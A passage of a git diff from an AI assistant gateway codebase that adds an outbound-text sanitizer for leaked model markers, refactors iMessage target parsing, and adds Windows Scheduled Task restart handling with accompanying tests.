}); + + it("strips trailing role turn markers", () => { + const text = "Hello\nassistant:\nuser:"; + const result = sanitizeOutboundText(text); + expect(result).not.toMatch(/^assistant:$/m); + }); + + it("collapses excessive blank lines after stripping", () => { + const text = "Hello\n\n\n\n\nWorld"; + expect(sanitizeOutboundText(text)).toBe("Hello\n\nWorld"); + }); + + it("handles combined internal markers in one message", () => { + const text = "step 1NO_REPLY +#+#+#+# assistant to=final\n\nActual reply"; + const result = sanitizeOutboundText(text); + expect(result).not.toContain(""); + expect(result).not.toContain("+#+#"); + expect(result).not.toMatch(/assistant to=final/i); + expect(result).toContain("Actual reply"); + }); +}); diff --git a/src/imessage/monitor/sanitize-outbound.ts b/src/imessage/monitor/sanitize-outbound.ts new file mode 100644 index 00000000000..9fe1664e1eb --- /dev/null +++ b/src/imessage/monitor/sanitize-outbound.ts @@ -0,0 +1,31 @@ +import { stripAssistantInternalScaffolding } from "../../shared/text/assistant-visible-text.js"; + +/** + * Patterns that indicate assistant-internal metadata leaked into text. + * These must never reach a user-facing channel. + */ +const INTERNAL_SEPARATOR_RE = /(?:#\+){2,}#?/g; +const ASSISTANT_ROLE_MARKER_RE = /\bassistant\s+to\s*=\s*\w+/gi; +const ROLE_TURN_MARKER_RE = /\b(?:user|system|assistant)\s*:\s*$/gm; + +/** + * Strip all assistant-internal scaffolding from outbound text before delivery. + * Applies reasoning/thinking tag removal, memory tag removal, and + * model-specific internal separator stripping. + */ +export function sanitizeOutboundText(text: string): string { + if (!text) { + return text; + } + + let cleaned = stripAssistantInternalScaffolding(text); + + cleaned = cleaned.replace(INTERNAL_SEPARATOR_RE, ""); + cleaned = cleaned.replace(ASSISTANT_ROLE_MARKER_RE, ""); + cleaned = cleaned.replace(ROLE_TURN_MARKER_RE, ""); + + // Collapse excessive blank lines left after stripping. + cleaned = cleaned.replace(/\n{3,}/g, "\n\n").trim(); + + return cleaned; +} diff --git a/src/imessage/target-parsing-helpers.ts b/src/imessage/target-parsing-helpers.ts index 2b64c145580..ba00590e6d5 100644 --- a/src/imessage/target-parsing-helpers.ts +++ b/src/imessage/target-parsing-helpers.ts @@ -1,3 +1,5 @@ +import { isAllowedParsedChatSender } from "../plugin-sdk/allow-from.js"; + export type ServicePrefix = { prefix: string; service: TService }; export type ChatTargetPrefixesParams = { @@ -13,10 +15,24 @@ export type ParsedChatTarget = | { kind: "chat_guid"; chatGuid: string } | { kind: "chat_identifier"; chatIdentifier: string }; +export type ParsedChatAllowTarget = ParsedChatTarget | { kind: "handle"; handle: string }; + +export type ChatSenderAllowParams = { + allowFrom: Array; + sender: string; + chatId?: number | null; + chatGuid?: string | null; + chatIdentifier?: string | null; +}; + function stripPrefix(value: string, prefix: string): string { return value.slice(prefix.length).trim(); } +function startsWithAnyPrefix(value: string, prefixes: readonly string[]): boolean { + return prefixes.some((prefix) => value.startsWith(prefix)); +} + export function resolveServicePrefixedTarget(params: { trimmed: string; lower: string; @@ -41,6 +57,31 @@ export function resolveServicePrefixedTarget(p return null; } +export function resolveServicePrefixedChatTarget(params: { + trimmed: string; + lower: string; + servicePrefixes: Array>; + chatIdPrefixes: string[]; + chatGuidPrefixes: string[]; + chatIdentifierPrefixes: string[]; + extraChatPrefixes?: string[]; + parseTarget: (remainder: string) => TTarget; +}): ({ kind: "handle"; to: string; service: TService } | TTarget) | null { + const chatPrefixes = [ + ...params.chatIdPrefixes, + ...params.chatGuidPrefixes, + ...params.chatIdentifierPrefixes, + ...(params.extraChatPrefixes ?? []), + ]; + return resolveServicePrefixedTarget({ + trimmed: params.trimmed, + lower: params.lower, + servicePrefixes: params.servicePrefixes, + isChatTarget: (remainderLower) => startsWithAnyPrefix(remainderLower, chatPrefixes), + parseTarget: params.parseTarget, + }); +} + export function parseChatTargetPrefixesOrThrow( params: ChatTargetPrefixesParams, ): ParsedChatTarget | null { @@ -97,6 +138,56 @@ export function resolveServicePrefixedAllowTarget(params: { return null; } +export function resolveServicePrefixedOrChatAllowTarget< + TAllowTarget extends ParsedChatAllowTarget, +>(params: { + trimmed: string; + lower: string; + servicePrefixes: Array<{ prefix: string }>; + parseAllowTarget: (remainder: string) => TAllowTarget; + chatIdPrefixes: string[]; + chatGuidPrefixes: string[]; + chatIdentifierPrefixes: string[]; +}): TAllowTarget | null { + const servicePrefixed = resolveServicePrefixedAllowTarget({ + trimmed: params.trimmed, + lower: params.lower, + servicePrefixes: params.servicePrefixes, + parseAllowTarget: params.parseAllowTarget, + }); + if (servicePrefixed) { + return servicePrefixed as TAllowTarget; + } + + const chatTarget = parseChatAllowTargetPrefixes({ + trimmed: params.trimmed, + lower: params.lower, + chatIdPrefixes: params.chatIdPrefixes, + chatGuidPrefixes: params.chatGuidPrefixes, + chatIdentifierPrefixes: params.chatIdentifierPrefixes, + }); + if (chatTarget) { + return chatTarget as TAllowTarget; + } + return null; +} + +export function createAllowedChatSenderMatcher(params: { + normalizeSender: (sender: string) => string; + parseAllowTarget: (entry: string) => TParsed; +}): (input: ChatSenderAllowParams) => boolean { + return (input) => + isAllowedParsedChatSender({ + allowFrom: input.allowFrom, + sender: input.sender, + chatId: input.chatId, + chatGuid: input.chatGuid, + chatIdentifier: input.chatIdentifier, + normalizeSender: params.normalizeSender, + parseAllowTarget: params.parseAllowTarget, + }); +} + export function parseChatAllowTargetPrefixes( params: ChatTargetPrefixesParams, ): ParsedChatTarget | null { diff --git a/src/imessage/targets.ts b/src/imessage/targets.ts index 75f159576ff..e709f1064e4 100644 --- a/src/imessage/targets.ts +++ b/src/imessage/targets.ts @@ -1,11 +1,11 @@ -import { isAllowedParsedChatSender } from "../plugin-sdk/allow-from.js"; import { normalizeE164 } from "../utils.js"; import { + createAllowedChatSenderMatcher, + type ChatSenderAllowParams, type ParsedChatTarget, - parseChatAllowTargetPrefixes, parseChatTargetPrefixesOrThrow, - resolveServicePrefixedAllowTarget, - resolveServicePrefixedTarget, + resolveServicePrefixedChatTarget, + resolveServicePrefixedOrChatAllowTarget, } from "./target-parsing-helpers.js"; export type IMessageService = "imessage" | "sms" | "auto"; @@ -80,14 +80,13 @@ export function parseIMessageTarget(raw: string): IMessageTarget { } const lower = trimmed.toLowerCase(); - const servicePrefixed = resolveServicePrefixedTarget({ + const servicePrefixed = resolveServicePrefixedChatTarget({ trimmed, lower, servicePrefixes: SERVICE_PREFIXES, - isChatTarget: (remainderLower) => - CHAT_ID_PREFIXES.some((p) => remainderLower.startsWith(p)) || - CHAT_GUID_PREFIXES.some((p) => remainderLower.startsWith(p)) || - CHAT_IDENTIFIER_PREFIXES.some((p) => remainderLower.startsWith(p)), + chatIdPrefixes: CHAT_ID_PREFIXES, + chatGuidPrefixes: CHAT_GUID_PREFIXES, + chatIdentifierPrefixes: CHAT_IDENTIFIER_PREFIXES, parseTarget: parseIMessageTarget, }); if (servicePrefixed) { @@ -115,46 +114,29 @@ export function parseIMessageAllowTarget(raw: string): IMessageAllowTarget { } const lower = trimmed.toLowerCase(); - const servicePrefixed = resolveServicePrefixedAllowTarget({ + const servicePrefixed = resolveServicePrefixedOrChatAllowTarget({ trimmed, lower, servicePrefixes: SERVICE_PREFIXES, parseAllowTarget: parseIMessageAllowTarget, + chatIdPrefixes: CHAT_ID_PREFIXES, + chatGuidPrefixes: CHAT_GUID_PREFIXES, + chatIdentifierPrefixes: CHAT_IDENTIFIER_PREFIXES, }); if (servicePrefixed) { return servicePrefixed; } - const chatTarget = parseChatAllowTargetPrefixes({ - trimmed, - lower, - chatIdPrefixes: CHAT_ID_PREFIXES, - chatGuidPrefixes: CHAT_GUID_PREFIXES, - chatIdentifierPrefixes: CHAT_IDENTIFIER_PREFIXES, - }); - if (chatTarget) { - return chatTarget; - } - return { kind: "handle", handle: normalizeIMessageHandle(trimmed) }; } -export function isAllowedIMessageSender(params: { - allowFrom: Array; - sender: string; - chatId?: number | null; - chatGuid?: string | null; - chatIdentifier?: string | null; -}): boolean { - return isAllowedParsedChatSender({ - allowFrom: params.allowFrom, - sender: params.sender, - chatId: params.chatId, - chatGuid: params.chatGuid, - chatIdentifier: params.chatIdentifier, - normalizeSender: normalizeIMessageHandle, - parseAllowTarget: parseIMessageAllowTarget, - }); +const isAllowedIMessageSenderMatcher = createAllowedChatSenderMatcher({ + normalizeSender: normalizeIMessageHandle, + parseAllowTarget: parseIMessageAllowTarget, +}); + +export function isAllowedIMessageSender(params: ChatSenderAllowParams): boolean { + return isAllowedIMessageSenderMatcher(params); } export function formatIMessageChatTarget(chatId?: number | null): string { diff --git a/src/infra/boundary-path.ts b/src/infra/boundary-path.ts index 2a4eb45a858..11d42758926 100644 --- a/src/infra/boundary-path.ts +++ b/src/infra/boundary-path.ts @@ -540,12 +540,9 @@ async function resolveOutsideBoundaryPathAsync(params: { return null; } const kind = await getPathKind(params.context.absolutePath, false); - return buildOutsideLexicalBoundaryPath({ + return buildOutsideBoundaryPathFromContext({ boundaryLabel: params.boundaryLabel, - rootCanonicalPath: params.context.rootCanonicalPath, - absolutePath: params.context.absolutePath, - canonicalOutsideLexicalPath: params.context.canonicalOutsideLexicalPath, - rootPath: params.context.rootPath, + context: params.context, kind, }); } @@ -558,13 +555,25 @@ function resolveOutsideBoundaryPathSync(params: { return null; } const kind = getPathKindSync(params.context.absolutePath, false); + return buildOutsideBoundaryPathFromContext({ + boundaryLabel: params.boundaryLabel, + context: params.context, + kind, + }); +} + +function buildOutsideBoundaryPathFromContext(params: { + boundaryLabel: string; + context: BoundaryResolutionContext; + kind: { exists: boolean; kind: ResolvedBoundaryPathKind }; +}): ResolvedBoundaryPath { return buildOutsideLexicalBoundaryPath({ boundaryLabel: params.boundaryLabel, rootCanonicalPath: params.context.rootCanonicalPath, absolutePath: params.context.absolutePath, canonicalOutsideLexicalPath: params.context.canonicalOutsideLexicalPath, rootPath: params.context.rootPath, - kind, + kind: params.kind, }); } diff --git a/src/infra/channel-summary.test.ts b/src/infra/channel-summary.test.ts index d56bdd7ac1e..1a16bdc53b6 100644 --- a/src/infra/channel-summary.test.ts +++ b/src/infra/channel-summary.test.ts @@ -33,9 +33,9 @@ function makeSlackHttpSummaryPlugin(): ChannelPlugin { botToken: "xoxb-http", signingSecret: "", botTokenSource: "config", - signingSecretSource: "config", + signingSecretSource: "config", // pragma: allowlist secret botTokenStatus: "available", - signingSecretStatus: "configured_unavailable", + signingSecretStatus: "configured_unavailable", // pragma: allowlist secret } : { accountId: "primary", diff --git a/src/infra/channel-summary.ts b/src/infra/channel-summary.ts index f412d687fd1..08fd35d9327 100644 --- a/src/infra/channel-summary.ts +++ b/src/infra/channel-summary.ts @@ -69,7 +69,10 @@ const buildAccountDetails = (params: { if (snapshot.appTokenSource && snapshot.appTokenSource !== "none") { details.push(`app:${snapshot.appTokenSource}`); } - if (snapshot.signingSecretSource && snapshot.signingSecretSource !== "none") { + if ( + snapshot.signingSecretSource && + snapshot.signingSecretSource !== "none" /* pragma: allowlist secret */ + ) { details.push(`signing:${snapshot.signingSecretSource}`); } if (hasConfiguredUnavailableCredentialStatus(params.entry.account)) { diff --git a/src/infra/env-file.ts b/src/infra/env-file.ts deleted file mode 100644 index 525af40bbae..00000000000 --- a/src/infra/env-file.ts +++ /dev/null @@ -1,54 +0,0 @@ -import fs from "node:fs"; -import path from "node:path"; -import { escapeRegExp, resolveConfigDir } from "../utils.js"; - -export function upsertSharedEnvVar(params: { - key: string; - value: string; - env?: NodeJS.ProcessEnv; -}): { path: string; updated: boolean; created: boolean } { - const env = params.env ?? process.env; - const dir = resolveConfigDir(env); - const filepath = path.join(dir, ".env"); - const key = params.key.trim(); - const value = params.value; - - let raw = ""; - if (fs.existsSync(filepath)) { - raw = fs.readFileSync(filepath, "utf8"); - } - - const lines = raw.length ? raw.split(/\r?\n/) : []; - const matcher = new RegExp(`^(\\s*(?:export\\s+)?)${escapeRegExp(key)}\\s*=`); - let updated = false; - let replaced = false; - - const nextLines = lines.map((line) => { - const match = line.match(matcher); - if (!match) { - return line; - } - replaced = true; - const prefix = match[1] ?? ""; - const next = `${prefix}${key}=${value}`; - if (next !== line) { - updated = true; - } - return next; - }); - - if (!replaced) { - nextLines.push(`${key}=${value}`); - updated = true; - } - - if (!fs.existsSync(dir)) { - fs.mkdirSync(dir, { recursive: true, mode: 0o700 }); - } - - const output = `${nextLines.join("\n")}\n`; - fs.writeFileSync(filepath, output, "utf8"); - fs.chmodSync(filepath, 0o600); - - return { path: filepath, updated, created: !raw }; -} diff --git a/src/infra/exec-approvals.ts b/src/infra/exec-approvals.ts index c99eaeef189..787b5dd7cb5 100644 --- a/src/infra/exec-approvals.ts +++ b/src/infra/exec-approvals.ts @@ -11,6 +11,30 @@ export type ExecHost = "sandbox" | "gateway" | "node"; export type ExecSecurity = "deny" | "allowlist" | "full"; export type ExecAsk = "off" | "on-miss" | "always"; +export function normalizeExecHost(value?: string | null): ExecHost | null { + const normalized = value?.trim().toLowerCase(); + if (normalized === "sandbox" || normalized === "gateway" || normalized === "node") { + return normalized; + } + return null; +} + +export function normalizeExecSecurity(value?: string | null): ExecSecurity | null { + const normalized = value?.trim().toLowerCase(); + if (normalized === "deny" || normalized === "allowlist" || normalized === "full") { + return normalized; + } + return null; +} + +export function normalizeExecAsk(value?: string | null): ExecAsk | null { + const normalized = value?.trim().toLowerCase(); + if (normalized === "off" || normalized === "on-miss" || normalized === "always") { + return normalized; + } + return null; +} + export type SystemRunApprovalBinding = { argv: string[]; cwd: string | null; diff --git a/src/infra/node-pairing.ts b/src/infra/node-pairing.ts index 69b90e0e853..dac53a3b4ee 100644 --- a/src/infra/node-pairing.ts +++ b/src/infra/node-pairing.ts @@ -10,8 +10,7 @@ import { import { rejectPendingPairingRequest } from "./pairing-pending.js"; import { generatePairingToken, verifyPairingToken } from "./pairing-token.js"; -export type NodePairingPendingRequest = { - requestId: string; +type NodePairingNodeMetadata = { nodeId: string; displayName?: string; platform?: string; @@ -24,26 +23,18 @@ export type NodePairingPendingRequest = { commands?: string[]; permissions?: Record; remoteIp?: string; +}; + +export type NodePairingPendingRequest = NodePairingNodeMetadata & { + requestId: string; silent?: boolean; isRepair?: boolean; ts: number; }; -export type NodePairingPairedNode = { - nodeId: string; +export type NodePairingPairedNode = Omit & { token: string; - displayName?: string; - platform?: string; - version?: string; - coreVersion?: string; - uiVersion?: string; - deviceFamily?: string; - modelIdentifier?: string; - caps?: string[]; - commands?: string[]; bins?: string[]; - permissions?: Record; - remoteIp?: string; createdAtMs: number; approvedAtMs: number; lastConnectedAtMs?: number; diff --git a/src/infra/parse-finite-number.test.ts b/src/infra/parse-finite-number.test.ts new file mode 100644 index 00000000000..8dd592b6558 --- /dev/null +++ b/src/infra/parse-finite-number.test.ts @@ -0,0 +1,19 @@ +import { describe, expect, it } from "vitest"; +import { parseFiniteNumber } from "./parse-finite-number.js"; + +describe("parseFiniteNumber", () => { + it("returns finite numbers", () => { + expect(parseFiniteNumber(42)).toBe(42); + }); + + it("parses numeric strings", () => { + expect(parseFiniteNumber("3.14")).toBe(3.14); + }); + + it("returns undefined for non-finite or non-numeric values", () => { + expect(parseFiniteNumber(Number.NaN)).toBeUndefined(); + expect(parseFiniteNumber(Number.POSITIVE_INFINITY)).toBeUndefined(); + expect(parseFiniteNumber("not-a-number")).toBeUndefined(); + expect(parseFiniteNumber(null)).toBeUndefined(); + }); +}); diff --git a/src/infra/parse-finite-number.ts b/src/infra/parse-finite-number.ts new file mode 100644 index 00000000000..cf0fa0a3773 --- /dev/null +++ b/src/infra/parse-finite-number.ts @@ -0,0 +1,12 @@ +export function parseFiniteNumber(value: unknown): number | undefined { + if (typeof value === "number" && Number.isFinite(value)) { + return value; + } + if (typeof value === "string") { + const parsed = Number.parseFloat(value); + if (Number.isFinite(parsed)) { + return parsed; + } + } + return undefined; +} diff --git a/src/infra/process-respawn.test.ts b/src/infra/process-respawn.test.ts index 06591711c81..4a18a797607 100644 --- a/src/infra/process-respawn.test.ts +++ b/src/infra/process-respawn.test.ts @@ -67,11 +67,14 @@ describe("restartGatewayProcessWithFreshPid", () => { expect(spawnMock).not.toHaveBeenCalled(); }); - it("returns supervised when launchd/systemd hints are present", () => { + it("returns supervised when launchd hints are present on macOS", () => { clearSupervisorHints(); + setPlatform("darwin"); process.env.LAUNCH_JOB_LABEL = "ai.openclaw.gateway"; + triggerOpenClawRestartMock.mockReturnValue({ ok: true, method: "launchctl" }); const result = restartGatewayProcessWithFreshPid(); expect(result.mode).toBe("supervised"); + expect(triggerOpenClawRestartMock).toHaveBeenCalledOnce(); expect(spawnMock).not.toHaveBeenCalled(); }); @@ -110,6 +113,7 @@ describe("restartGatewayProcessWithFreshPid", () => { it("spawns detached child with current exec argv", () => { delete process.env.OPENCLAW_NO_RESPAWN; clearSupervisorHints(); + setPlatform("linux"); process.execArgv = ["--import", "tsx"]; process.argv = ["/usr/local/bin/node", "/repo/dist/index.js", "gateway", "run"]; spawnMock.mockReturnValue({ pid: 4242, unref: vi.fn() }); @@ -134,23 +138,68 @@ describe("restartGatewayProcessWithFreshPid", () => { it("returns supervised when OPENCLAW_SYSTEMD_UNIT is set", () => { clearSupervisorHints(); + setPlatform("linux"); process.env.OPENCLAW_SYSTEMD_UNIT = "openclaw-gateway.service"; const result = restartGatewayProcessWithFreshPid(); expect(result.mode).toBe("supervised"); expect(spawnMock).not.toHaveBeenCalled(); }); - it("returns supervised when OPENCLAW_SERVICE_MARKER is set", () => { + it("returns supervised when OpenClaw gateway task markers are set on Windows", () => { clearSupervisorHints(); - process.env.OPENCLAW_SERVICE_MARKER = "gateway"; + setPlatform("win32"); + process.env.OPENCLAW_SERVICE_MARKER = "openclaw"; + process.env.OPENCLAW_SERVICE_KIND = "gateway"; + triggerOpenClawRestartMock.mockReturnValue({ ok: true, method: "schtasks" }); const result = restartGatewayProcessWithFreshPid(); expect(result.mode).toBe("supervised"); + expect(triggerOpenClawRestartMock).toHaveBeenCalledOnce(); + expect(spawnMock).not.toHaveBeenCalled(); + }); + + it("keeps generic service markers out of non-Windows supervisor detection", () => { + clearSupervisorHints(); + setPlatform("linux"); + process.env.OPENCLAW_SERVICE_MARKER = "openclaw"; + process.env.OPENCLAW_SERVICE_KIND = "gateway"; + spawnMock.mockReturnValue({ pid: 4242, unref: vi.fn() }); + + const result = restartGatewayProcessWithFreshPid(); + + expect(result).toEqual({ mode: "spawned", pid: 4242 }); + expect(triggerOpenClawRestartMock).not.toHaveBeenCalled(); + }); + + it("returns disabled on Windows without Scheduled Task markers", () => { + clearSupervisorHints(); + setPlatform("win32"); + + const result = restartGatewayProcessWithFreshPid(); + + expect(result.mode).toBe("disabled"); + expect(result.detail).toContain("Scheduled Task"); + expect(spawnMock).not.toHaveBeenCalled(); + }); + + it("ignores node task script hints for gateway restart detection on Windows", () => { + clearSupervisorHints(); + setPlatform("win32"); + process.env.OPENCLAW_TASK_SCRIPT = "C:\\openclaw\\node.cmd"; + process.env.OPENCLAW_TASK_SCRIPT_NAME = "node.cmd"; + process.env.OPENCLAW_SERVICE_MARKER = "openclaw"; + process.env.OPENCLAW_SERVICE_KIND = "node"; + + const result = restartGatewayProcessWithFreshPid(); + + expect(result.mode).toBe("disabled"); + expect(triggerOpenClawRestartMock).not.toHaveBeenCalled(); expect(spawnMock).not.toHaveBeenCalled(); }); it("returns failed when spawn throws", () => { delete process.env.OPENCLAW_NO_RESPAWN; clearSupervisorHints(); + setPlatform("linux"); spawnMock.mockImplementation(() => { throw new Error("spawn failed"); diff --git a/src/infra/process-respawn.ts b/src/infra/process-respawn.ts index 554a1f9a93c..0edc43f2de4 100644 --- a/src/infra/process-respawn.ts +++ b/src/infra/process-respawn.ts @@ -1,6 +1,6 @@ import { spawn } from "node:child_process"; import { triggerOpenClawRestart } from "./restart.js"; -import { hasSupervisorHint } from "./supervisor-markers.js"; +import { detectRespawnSupervisor } from "./supervisor-markers.js"; type RespawnMode = "spawned" | "supervised" | "disabled" | "failed"; @@ -18,13 +18,9 @@ function isTruthy(value: string | undefined): boolean { return normalized === "1" || normalized === "true" || normalized === "yes" || normalized === "on"; } -function isLikelySupervisedProcess(env: NodeJS.ProcessEnv = process.env): boolean { - return hasSupervisorHint(env); -} - /** * Attempt to restart this process with a fresh PID. - * - supervised environments (launchd/systemd): caller should exit and let supervisor restart + * - supervised environments (launchd/systemd/schtasks): caller should exit and let supervisor restart * - OPENCLAW_NO_RESPAWN=1: caller should keep in-process restart behavior (tests/dev) * - otherwise: spawn detached child with current argv/execArgv, then caller exits */ @@ -32,20 +28,27 @@ export function restartGatewayProcessWithFreshPid(): GatewayRespawnResult { if (isTruthy(process.env.OPENCLAW_NO_RESPAWN)) { return { mode: "disabled" }; } - if (isLikelySupervisedProcess(process.env)) { - // On macOS under launchd, actively kickstart the supervised service to - // bypass ThrottleInterval delays for intentional restarts. - if (process.platform === "darwin" && process.env.OPENCLAW_LAUNCHD_LABEL?.trim()) { + const supervisor = detectRespawnSupervisor(process.env); + if (supervisor) { + if (supervisor === "launchd" || supervisor === "schtasks") { const restart = triggerOpenClawRestart(); if (!restart.ok) { return { mode: "failed", - detail: restart.detail ?? "launchctl kickstart failed", + detail: restart.detail ?? `${restart.method} restart failed`, }; } } return { mode: "supervised" }; } + if (process.platform === "win32") { + // Detached respawn is unsafe on Windows without an identified Scheduled Task: + // the child becomes orphaned if the original process exits. + return { + mode: "disabled", + detail: "win32: detached respawn unsupported without Scheduled Task markers", + }; + } try { const args = [...process.execArgv, ...process.argv.slice(1)]; diff --git a/src/infra/provider-usage.auth.normalizes-keys.test.ts b/src/infra/provider-usage.auth.normalizes-keys.test.ts index 3dccd2bf1be..bae5ae5a7d9 100644 --- a/src/infra/provider-usage.auth.normalizes-keys.test.ts +++ b/src/infra/provider-usage.auth.normalizes-keys.test.ts @@ -248,17 +248,17 @@ describe("resolveProviderAuths key normalization", () => { zai: { baseUrl: "https://api.z.ai", models: [modelDef], - apiKey: "cfg-zai-key", + apiKey: "cfg-zai-key", // pragma: allowlist secret }, minimax: { baseUrl: "https://api.minimaxi.com", models: [modelDef], - apiKey: "cfg-minimax-key", + apiKey: "cfg-minimax-key", // pragma: allowlist secret }, xiaomi: { baseUrl: "https://api.xiaomi.example", models: [modelDef], - apiKey: "cfg-xiaomi-key", + apiKey: "cfg-xiaomi-key", // pragma: allowlist secret }, }, }, diff --git a/src/infra/provider-usage.fetch.shared.ts b/src/infra/provider-usage.fetch.shared.ts index 2a2d2d0201b..20c9ab18d09 100644 --- a/src/infra/provider-usage.fetch.shared.ts +++ b/src/infra/provider-usage.fetch.shared.ts @@ -1,3 +1,4 @@ +import { parseFiniteNumber as parseFiniteNumberish } from "./parse-finite-number.js"; import { PROVIDER_LABELS } from "./provider-usage.shared.js"; import type { ProviderUsageSnapshot, UsageProviderId } from "./provider-usage.types.js"; @@ -17,16 +18,7 @@ export async function fetchJson( } export function parseFiniteNumber(value: unknown): number | undefined { - if (typeof value === "number" && Number.isFinite(value)) { - return value; - } - if (typeof value === "string") { - const parsed = Number.parseFloat(value); - if (Number.isFinite(parsed)) { - return parsed; - } - } - return undefined; + return parseFiniteNumberish(value); } type BuildUsageHttpErrorSnapshotOptions = { diff --git a/src/infra/restart.ts b/src/infra/restart.ts index 3f65cfc1614..ddb4352e5ca 100644 --- a/src/infra/restart.ts +++ b/src/infra/restart.ts @@ -7,10 +7,11 @@ import { } from "../daemon/constants.js"; import { createSubsystemLogger } from "../logging/subsystem.js"; import { cleanStaleGatewayProcessesSync, findGatewayPidsOnPortSync } from "./restart-stale-pids.js"; +import { relaunchGatewayScheduledTask } from "./windows-task-restart.js"; export type RestartAttempt = { ok: boolean; - method: "launchctl" | "systemd" | "supervisor"; + method: "launchctl" | "systemd" | "schtasks" | "supervisor"; detail?: string; tried?: string[]; }; @@ -296,36 +297,41 @@ export function triggerOpenClawRestart(): RestartAttempt { cleanStaleGatewayProcessesSync(); const tried: string[] = []; - if (process.platform !== "darwin") { - if (process.platform === "linux") { - const unit = normalizeSystemdUnit( - process.env.OPENCLAW_SYSTEMD_UNIT, - process.env.OPENCLAW_PROFILE, - ); - const userArgs = ["--user", "restart", unit]; - tried.push(`systemctl ${userArgs.join(" ")}`); - const userRestart = spawnSync("systemctl", userArgs, { - encoding: "utf8", - timeout: SPAWN_TIMEOUT_MS, - }); - if (!userRestart.error && userRestart.status === 0) { - return { ok: true, method: "systemd", tried }; - } - const systemArgs = ["restart", unit]; - tried.push(`systemctl ${systemArgs.join(" ")}`); - const systemRestart = spawnSync("systemctl", systemArgs, { - encoding: "utf8", - timeout: SPAWN_TIMEOUT_MS, - }); - if (!systemRestart.error && systemRestart.status === 0) { - return { ok: true, method: "systemd", tried }; - } - const detail = [ - `user: ${formatSpawnDetail(userRestart)}`, - `system: ${formatSpawnDetail(systemRestart)}`, - ].join("; "); - return { ok: false, method: "systemd", detail, tried }; + if (process.platform === "linux") { + const unit = normalizeSystemdUnit( + process.env.OPENCLAW_SYSTEMD_UNIT, + process.env.OPENCLAW_PROFILE, + ); + const userArgs = ["--user", "restart", unit]; + tried.push(`systemctl ${userArgs.join(" ")}`); + const userRestart = spawnSync("systemctl", userArgs, { + encoding: "utf8", + timeout: SPAWN_TIMEOUT_MS, + }); + if (!userRestart.error && userRestart.status === 0) { + return { ok: true, method: "systemd", tried }; } + const systemArgs = ["restart", unit]; + tried.push(`systemctl ${systemArgs.join(" ")}`); + const systemRestart = spawnSync("systemctl", systemArgs, { + encoding: "utf8", + timeout: SPAWN_TIMEOUT_MS, + }); + if (!systemRestart.error && systemRestart.status === 0) { + return { ok: true, method: "systemd", tried }; + } + const detail = [ + `user: ${formatSpawnDetail(userRestart)}`, + `system: ${formatSpawnDetail(systemRestart)}`, + ].join("; "); + return { ok: false, method: "systemd", detail, tried }; + } + + if (process.platform === "win32") { + return relaunchGatewayScheduledTask(process.env); + } + + if (process.platform !== "darwin") { return { ok: false, method: "supervisor", diff --git a/src/infra/supervisor-markers.ts b/src/infra/supervisor-markers.ts index 231bece5e3d..f024ddeca2e 100644 --- a/src/infra/supervisor-markers.ts +++ b/src/infra/supervisor-markers.ts @@ -1,20 +1,52 @@ -export const SUPERVISOR_HINT_ENV_VARS = [ - // macOS launchd +const LAUNCHD_SUPERVISOR_HINT_ENV_VARS = [ "LAUNCH_JOB_LABEL", "LAUNCH_JOB_NAME", - // OpenClaw service env markers "OPENCLAW_LAUNCHD_LABEL", +] as const; + +const SYSTEMD_SUPERVISOR_HINT_ENV_VARS = [ "OPENCLAW_SYSTEMD_UNIT", - "OPENCLAW_SERVICE_MARKER", - // Linux systemd "INVOCATION_ID", "SYSTEMD_EXEC_PID", "JOURNAL_STREAM", ] as const; -export function hasSupervisorHint(env: NodeJS.ProcessEnv = process.env): boolean { - return SUPERVISOR_HINT_ENV_VARS.some((key) => { +const WINDOWS_TASK_SUPERVISOR_HINT_ENV_VARS = ["OPENCLAW_WINDOWS_TASK_NAME"] as const; + +export const SUPERVISOR_HINT_ENV_VARS = [ + ...LAUNCHD_SUPERVISOR_HINT_ENV_VARS, + ...SYSTEMD_SUPERVISOR_HINT_ENV_VARS, + ...WINDOWS_TASK_SUPERVISOR_HINT_ENV_VARS, + "OPENCLAW_SERVICE_MARKER", + "OPENCLAW_SERVICE_KIND", +] as const; + +export type RespawnSupervisor = "launchd" | "systemd" | "schtasks"; + +function hasAnyHint(env: NodeJS.ProcessEnv, keys: readonly string[]): boolean { + return keys.some((key) => { const value = env[key]; return typeof value === "string" && value.trim().length > 0; }); } + +export function detectRespawnSupervisor( + env: NodeJS.ProcessEnv = process.env, + platform: NodeJS.Platform = process.platform, +): RespawnSupervisor | null { + if (platform === "darwin") { + return hasAnyHint(env, LAUNCHD_SUPERVISOR_HINT_ENV_VARS) ? "launchd" : null; + } + if (platform === "linux") { + return hasAnyHint(env, SYSTEMD_SUPERVISOR_HINT_ENV_VARS) ? "systemd" : null; + } + if (platform === "win32") { + if (hasAnyHint(env, WINDOWS_TASK_SUPERVISOR_HINT_ENV_VARS)) { + return "schtasks"; + } + const marker = env.OPENCLAW_SERVICE_MARKER?.trim(); + const serviceKind = env.OPENCLAW_SERVICE_KIND?.trim(); + return marker && serviceKind === "gateway" ? "schtasks" : null; + } + return null; +} diff --git a/src/infra/unhandled-rejections.fatal-detection.test.ts b/src/infra/unhandled-rejections.fatal-detection.test.ts index 1a4ff61879d..3a19d5bb6ed 100644 --- a/src/infra/unhandled-rejections.fatal-detection.test.ts +++ b/src/infra/unhandled-rejections.fatal-detection.test.ts @@ -86,7 +86,7 @@ describe("installUnhandledRejectionHandler - fatal detection", () => { describe("non-fatal errors", () => { it("does not exit on known transient network errors", () => { - const transientCases = [ + const transientCases: unknown[] = [ Object.assign(new TypeError("fetch failed"), { cause: { code: "UND_ERR_CONNECT_TIMEOUT", syscall: "connect" }, }), @@ -111,6 +111,11 @@ describe("installUnhandledRejectionHandler - fatal detection", () => { }), ]; + // Wrapped fetch-failed (e.g. Discord: "Failed to get gateway information from Discord: fetch failed") + transientCases.push( + new Error("Failed to get gateway information from Discord: fetch failed"), + ); + for (const transientErr of transientCases) { expectExitCodeFromUnhandled(transientErr, []); } diff --git a/src/infra/unhandled-rejections.test.ts b/src/infra/unhandled-rejections.test.ts index 6b1e4a19108..5df7ee6949e 100644 --- a/src/infra/unhandled-rejections.test.ts +++ b/src/infra/unhandled-rejections.test.ts @@ -56,10 +56,13 @@ describe("isTransientNetworkError", () => { "EHOSTUNREACH", "ENETUNREACH", "EAI_AGAIN", + "EPROTO", "UND_ERR_CONNECT_TIMEOUT", "UND_ERR_SOCKET", "UND_ERR_HEADERS_TIMEOUT", "UND_ERR_BODY_TIMEOUT", + "ERR_SSL_WRONG_VERSION_NUMBER", + "ERR_SSL_PROTOCOL_RETURNED_AN_ERROR", ]; 